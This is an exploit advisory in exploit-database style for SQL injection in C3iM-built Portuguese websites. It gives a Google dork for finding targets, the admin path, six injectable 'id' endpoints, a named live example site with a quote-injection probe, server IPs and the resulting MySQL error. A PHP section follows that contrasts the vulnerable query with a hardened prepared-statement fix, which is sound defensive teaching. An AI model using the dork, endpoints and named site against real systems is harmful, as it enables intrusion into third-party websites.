
C3iM SQL Injection

Author: KingSkrupellos, Published: 18-01-2019
#########################################################

# Exploit Title : C3iM SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 17/01/2019
# Vendor Homepage : c3im.pt
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Desenvolvido C3iM'' site:pt
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#########################################################

# Admin Panel Login Path :
*************************
/admin

# SQL Injection Exploit :
***********************

/associados_id.php?id=[SQL Injection]

/conteudo.php?id=[SQL Injection]

/new.php?id=[SQL Injection]

/content.php?id=[SQL Injection]

/event.php?id=[SQL Injection]

/noticia.php?id=[SQL Injection]

#########################################################

# Example Vulnerable Site :
*************************

[+] danotec.pt/conteudo.php?id=1%27 =>

[ Proof of Concept ] => archive.is/BcJYk

Note : (192.185.106.107) => There are 104 domains hosted on this server.

Note : (192.185.86.89) => There are 174 domains hosted on this server.

#########################################################

# SQL Database Error :
**********************

You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for
the right syntax to use near '\'' at line 1
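The `id` handling that produces the MySQL error above, shown as an added PHP example (not code from the advisory or from the C3iM vendor) next to the prepared-statement form that closes the hole; the table name `conteudo`, its columns, and the DSN are assumptions made for illustration.

```php
<?php
// Added example, not the vendor's code. Table/column names and the DSN
// are assumptions; the pattern is the one behind conteudo.php?id=1'.

$pdo = new PDO('mysql:host=localhost;dbname=site;charset=utf8mb4', 'user', 'pass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepares
]);

// Vulnerable: the raw query-string value is spliced into the SQL text.
// id=1' unbalances the quotes and MySQL answers with the syntax error the
// advisory quotes; a page that prints that error confirms the bug to anyone.
function conteudo_vulnerable(PDO $pdo, array $get): ?array
{
    $sql = "SELECT id, titulo, texto FROM conteudo WHERE id = '" . $get['id'] . "'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Hardened: enforce the type the parameter is meant to have, bind it as a
// parameter so it can never become SQL syntax, and keep driver errors out
// of the HTTP response.
function conteudo_hardened(PDO $pdo, array $get): ?array
{
    $id = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);           // "1'" is rejected here, before any SQL
        return null;
    }
    try {
        $stmt = $pdo->prepare('SELECT id, titulo, texto FROM conteudo WHERE id = :id');
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
        $stmt->execute();
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row ?: null;
    } catch (PDOException $e) {
        error_log($e->getMessage());       // server-side log only, nothing to the client
        http_response_code(500);
        return null;
    }
}
```

The same two-step fix (integer validation plus a bound parameter) applies to every `?id=` script listed above, since they all take the same kind of numeric key.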

#########################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#########################################################
